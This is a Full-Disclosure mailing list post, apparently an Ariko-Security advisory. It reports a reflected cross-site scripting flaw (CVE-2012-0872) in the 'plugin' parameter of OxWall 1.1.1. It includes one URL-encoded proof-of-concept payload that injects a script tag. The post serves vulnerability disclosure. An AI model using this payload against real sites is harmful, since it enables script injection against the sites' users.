[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Addition to CVE-2012-0872 oxwall



Our addition to yesterday YGn advisory:


# CVE-2012-0872

============ { Ariko-Security - Advisory #2/2/2012 } =============

OxWall Cross-site scripting (XSS)


Vendor's description of software and download:
# Oxwall Foundation http://www.oxwall.org/

Dork:
# N/a

Application Info:
#OxWall 1.1.1


Vulnerability Info:
# Type: XSS 

Time Table:
# 13/02/2012 - Vendor notified


XSS:
#Input passed to the "plugin" parameter in index.php is not properly sanitised 
before being returned to the user.

Solution:
# Input validation of vulnerable parameters should be corrected.

POC:

http://site/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E

advisory:
http://advisories.ariko-security.com/2012/audyt_bezpieczenstwa_2m2.html

Credit:
# Discoverd By: Ariko-Security 2012

Ariko-Security
Rynek Glowny 12
32-600 Oswiecim
tel:. +48 33 4741511 mobile: +48 784086818
(Mo-Fr 10.00-20.00 CET)

Ariko-Security Sp. z o.o. z siedzibą w Oświęcimiu , zarejestrowana przez Sąd 
Rejonowy dla m. Krakowa-Śródmieścia, XII Wydział Gospodarczy Krajowego Rejestru 
Sądowego, KRS: 00000358273, NIP: 549-239-90-67, REGON 121262172








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/